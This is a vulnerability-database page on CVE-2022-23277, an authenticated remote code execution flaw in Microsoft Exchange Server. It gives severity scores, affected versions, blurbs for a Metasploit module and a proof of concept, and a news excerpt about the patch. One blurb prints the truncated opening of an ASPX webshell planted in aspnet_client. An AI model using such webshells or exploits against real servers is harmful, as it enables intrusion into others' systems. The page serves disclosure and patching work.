Published: 09/03/2022 Updated: 29/06/2023

CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8

CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8

VMScore: 578

Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Microsoft Exchange Server Remote Code Execution Vulnerability

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft exchange server 2013
microsoft exchange server 2016
microsoft exchange server 2019

This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU Note that authentication is required to exploit these vulnerabilities ...

CVE-2022-23277 POC to write a webshell to aspnet_client

exch_CVE-2021-42321 本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具认证部分需要通过burpsuite手动添加，利用成功后会在aspnet_client写入1aspx。 webshell: <%@ Page Language="JScript" Debug="true"%><%@Import Namespace="SystemIO"%><%FileWriteAllB

Microsoft patches critical remote-code-exec hole in Exchange Server and others

The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Get our weekly newsletter And Adobe, SAP, Intel, AMD, Cisco, Google join in

Patch Tuesday Microsoft has addressed 71 security flaws, including three critical remote code execution vulnerabilities, in its monthly Patch Tuesday update. The IT giant is confident none of the bugs have been actively exploited. One of those critical RCEs is in Microsoft Exchange Server, and labeled CVE-2022-23277. It can be exploited by an authenticated user to "trigger malicious code in the context of the server's account through a network call," said Redmond. Yes, an attacker nee...

CVE-2022-23277

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect